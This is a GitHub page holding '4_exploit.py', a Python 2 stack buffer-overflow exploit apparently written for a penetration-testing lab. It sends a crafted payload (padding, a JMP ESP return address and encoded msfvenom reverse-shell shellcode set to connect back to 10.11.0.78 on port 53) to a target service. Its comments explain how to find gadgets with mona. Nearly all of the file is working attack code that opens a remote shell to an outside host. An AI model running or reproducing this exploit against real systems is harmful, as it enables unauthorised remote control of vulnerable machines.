-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy path4_exploit.py
69 lines (59 loc) · 3.08 KB
/
4_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python2
import socket
import struct
from constants import *
SUB_ESP_10 = "\x83\xec\x10"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "Run !mona jmp -r esp -cpb \"BAD_CHARS\" to find a JMP ESP instruction in Immunity"
print "Then generate appropriate shellcode. see comments"
# !mona jmp -r esp -cpb "\x00\x0A"
ptr_jmp_esp = 0x5f4a358f
# if that doesn't work, then:
#Modules: !mona modules -- Look for no DEP, NX, ASLR && No Bad Char in address
#go to the module "e then double click module"
#!mona find -s esp -m MODULE.dll -cpb "\x00\x0a" "look for JMP ESP or PUSH ESP RETN"
#if no DEP, you can try "./nasm_shell JMP ESP > FFE4"
#!mona find -s "\xff\xe4" -m MODULE.dll -cpb "\x00\x0a"
#Ensure JMP ESP by following address in disassembler "click on it then hit enter"
#You can also try !mona suggest to see what would work
# msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' -f python -v shellcode EXITFUNC=thread LHOST=10.11.0.78 LPORT=53
shellcode = ""
shellcode += "\xb8\x79\xe2\x6c\xab\xdb\xc0\xd9\x74\x24\xf4\x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\xba"
shellcode += "\xe6\x8e\x5e\xc0\x0f\xcc\xa1\x38\xd0\xb1\x28\xdd"
shellcode += "\xe1\xf1\x4f\x96\x52\xc2\x04\xfa\x5e\xa9\x49\xee"
shellcode += "\xd5\xdf\x45\x01\x5d\x55\xb0\x2c\x5e\xc6\x80\x2f"
shellcode += "\xdc\x15\xd5\x8f\xdd\xd5\x28\xce\x1a\x0b\xc0\x82"
shellcode += "\xf3\x47\x77\x32\x77\x1d\x44\xb9\xcb\xb3\xcc\x5e"
shellcode += "\x9b\xb2\xfd\xf1\x97\xec\xdd\xf0\x74\x85\x57\xea"
shellcode += "\x99\xa0\x2e\x81\x6a\x5e\xb1\x43\xa3\x9f\x1e\xaa"
shellcode += "\x0b\x52\x5e\xeb\xac\x8d\x15\x05\xcf\x30\x2e\xd2"
shellcode += "\xad\xee\xbb\xc0\x16\x64\x1b\x2c\xa6\xa9\xfa\xa7"
shellcode += "\xa4\x06\x88\xef\xa8\x99\x5d\x84\xd5\x12\x60\x4a"
shellcode += "\x5c\x60\x47\x4e\x04\x32\xe6\xd7\xe0\x95\x17\x07"
shellcode += "\x4b\x49\xb2\x4c\x66\x9e\xcf\x0f\xef\x53\xe2\xaf"
shellcode += "\xef\xfb\x75\xdc\xdd\xa4\x2d\x4a\x6e\x2c\xe8\x8d"
shellcode += "\x91\x07\x4c\x01\x6c\xa8\xad\x08\xab\xfc\xfd\x22"
shellcode += "\x1a\x7d\x96\xb2\xa3\xa8\x39\xe2\x0b\x03\xfa\x52"
shellcode += "\xec\xf3\x92\xb8\xe3\x2c\x82\xc3\x29\x45\x29\x3e"
shellcode += "\xba\x60\xa5\x40\x74\x1d\xbb\x40\x88\xe8\x32\xa6"
shellcode += "\xe2\x02\x13\x71\x9b\xbb\x3e\x09\x3a\x43\x95\x74"
shellcode += "\x7c\xcf\x1a\x89\x33\x38\x56\x99\xa4\xc8\x2d\xc3"
shellcode += "\x63\xd6\x9b\x6b\xef\x45\x40\x6b\x66\x76\xdf\x3c"
shellcode += "\x2f\x48\x16\xa8\xdd\xf3\x80\xce\x1f\x65\xea\x4a"
shellcode += "\xc4\x56\xf5\x53\x89\xe3\xd1\x43\x57\xeb\x5d\x37"
shellcode += "\x07\xba\x0b\xe1\xe1\x14\xfa\x5b\xb8\xcb\x54\x0b"
shellcode += "\x3d\x20\x67\x4d\x42\x6d\x11\xb1\xf3\xd8\x64\xce"
shellcode += "\x3c\x8d\x60\xb7\x20\x2d\x8e\x62\xe1\x4d\x6d\xa6"
shellcode += "\x1c\xe6\x28\x23\x9d\x6b\xcb\x9e\xe2\x95\x48\x2a"
shellcode += "\x9b\x61\x50\x5f\x9e\x2e\xd6\x8c\xd2\x3f\xb3\xb2"
shellcode += "\x41\x3f\x96"
buf = ""
buf += "A"*(BUFFER_OFFSET - len(buf))
buf += struct.pack("<I", ptr_jmp_esp)
buf += SUB_ESP_10
buf += shellcode
buf += "D"*(BUFFER_TOTLEN - len(buf))
buf += "\r\n"
send_payload(s, buf)